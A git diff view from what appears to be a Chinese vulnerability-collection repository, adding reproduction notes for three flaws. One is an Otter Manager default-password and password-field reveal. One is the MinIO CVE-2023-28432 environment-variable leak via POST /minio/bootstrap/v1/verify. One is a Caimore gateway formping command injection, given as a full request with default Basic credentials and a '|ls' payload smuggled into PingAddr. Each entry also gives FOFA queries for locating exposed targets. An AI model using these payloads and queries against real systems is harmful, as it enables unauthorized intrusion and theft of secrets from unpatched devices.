* https://forum.ywhack.com/thread-115309-1-8.html
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
title="Otter Manager"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
默认口令:`admin/admin`
|
||||
|
||||
进入后直接f12查看元素,修改password为text即可查看数据库等敏感信息密码。
|
||||
31
服务器应用漏洞/MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432.md
Normal file
31
服务器应用漏洞/MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432.md
Normal file
@ -0,0 +1,31 @@
|
||||
# MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
Minio 是一个多云对象存储框架。在从RELEASE.2019-12-17T23-16-33Z开始到RELEASE.2023-03-20T20-16-18Z之前的集群部署中,MinIO存在漏洞发送请求后返回所有环境变量,包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,导致信息泄露。分布式部署的所有用户都会受到影响
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
MinIO <= RELEASE.2023-03-20T20-16-18Z
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="minio"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登陆页面
|
||||
|
||||
|
||||
|
||||
验证POC (默认端口:9000)
|
||||
|
||||
```
|
||||
POST /minio/bootstrap/v1/verify
|
||||
```
|
||||
|
||||
|
||||
BIN
服务器应用漏洞/images/image-20230417093052971.png
Normal file
BIN
服务器应用漏洞/images/image-20230417093052971.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 578 KiB |
BIN
服务器应用漏洞/images/image-20230417093122553.png
Normal file
BIN
服务器应用漏洞/images/image-20230417093122553.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 321 KiB |
BIN
网络设备漏洞/images/image-20230417100349175.png
Normal file
BIN
网络设备漏洞/images/image-20230417100349175.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 414 KiB |
BIN
网络设备漏洞/images/image-20230417100401289.png
Normal file
BIN
网络设备漏洞/images/image-20230417100401289.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 185 KiB |
34
网络设备漏洞/才茂通信 网关 formping 远程命令执行漏洞.md
Normal file
34
网络设备漏洞/才茂通信 网关 formping 远程命令执行漏洞.md
Normal file
@ -0,0 +1,34 @@
|
||||
# 才茂通信 网关 formping 远程命令执行漏洞
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
才茂通信网关 formping 接口存在远程命令执行漏洞,攻击者通过默认口令 admin/admin 登陆系统后通过命令可以获取服务器权限
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
才茂通信 网关
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="CAIMORE-Gateway"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登陆页面,默认口令 admin/admin
|
||||
|
||||
|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
POST /goform/formping
|
||||
Authorization: Basic YWRtaW46YWRtaW4=
|
||||
|
||||
PingAddr=www.baidu.com%7Cls&PingPackNumb=1&PingMsg=
|
||||
```
|
||||
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user